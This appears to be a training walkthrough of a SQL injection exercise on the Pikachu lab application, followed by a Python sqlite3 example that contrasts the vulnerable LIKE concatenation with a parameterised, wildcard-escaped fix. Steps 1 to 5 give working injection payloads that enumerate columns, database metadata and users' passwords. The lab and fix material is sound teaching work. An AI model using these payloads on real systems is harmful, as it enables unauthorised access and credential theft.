1. First, confirm that SQL injection is possible.
For example, guess at the back-end query (the username search):
select id, username from users where username like '%username%'
Injection attempt: username%' or 1=1 #
Resulting query: select id, username from users where username like '%username%' or 1=1 # %'
2. Once injection is confirmed, use group by to find the number of columns (binary search over the column count):
Attempt 1:
username%' or 1=1 group by 5#
Attempt 2:
username%' or 1=1 group by 3#
Attempt 3:
username%' or 1=1 group by 2#
3. With the column count known, identify the current user and database:
username%' union select user(), database() #
4. Query MySQL's INFORMATION_SCHEMA
-- 1. Using the database name, query INFORMATION_SCHEMA.TABLES to get the table names
username%' union SELECT TABLE_NAME, TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA = 'pikachu'#
-- 2. Using the database name and table name, get all column names of the table
username%' union SELECT COLUMN_NAME, COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = 'users' AND TABLE_SCHEMA = 'pikachu' #
5. Retrieve the user table (accounts and passwords):
username%' union select username, password from pikachu.users #
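The root cause in every step above is the same: the search term is pasted into the LIKE '%...%' string. The following added example (not Pikachu's code) shows that concatenation beside the fix: a bound parameter plus escaping of the LIKE wildcards, so the page's tautology payload and a bare % are matched literally instead of widening the query. It uses Python's built-in sqlite3 with a constructed users table; SQLite reads -- as a comment where MySQL accepts #, so the payload is written with -- here.

```python
import sqlite3

# Constructed sample rows standing in for Pikachu's users table (not the real data).
USERS = [(1, "admin", "pw-admin"), (2, "pikachu", "pw-pikachu"), (3, "test", "pw-test")]


def make_db():
    """In-memory database seeded with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", USERS)
    return conn


def search_vulnerable(conn, term):
    """The pattern from the page: the search term is concatenated into LIKE '%...%'."""
    sql = f"SELECT id, username FROM users WHERE username LIKE '%{term}%'"
    return conn.execute(sql).fetchall()


def escape_like(term):
    """Neutralise LIKE metacharacters so user input cannot widen the match.

    Backslash is the escape character declared in the ESCAPE clause below.
    """
    return term.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")


def search_safe(conn, term):
    """Fixed version: the whole pattern travels as a bound parameter."""
    sql = "SELECT id, username FROM users WHERE username LIKE ? ESCAPE '\\'"
    return conn.execute(sql, ("%" + escape_like(term) + "%",)).fetchall()


if __name__ == "__main__":
    db = make_db()
    payload = "x%' or 1=1 -- "  # the page's tautology, with SQLite's comment marker
    print("vulnerable, normal term :", search_vulnerable(db, "pika"))
    print("vulnerable, payload     :", search_vulnerable(db, payload))
    print("vulnerable, bare %      :", search_vulnerable(db, "%"))
    print("safe, payload           :", search_safe(db, payload))
    print("safe, bare %            :", search_safe(db, "%"))
```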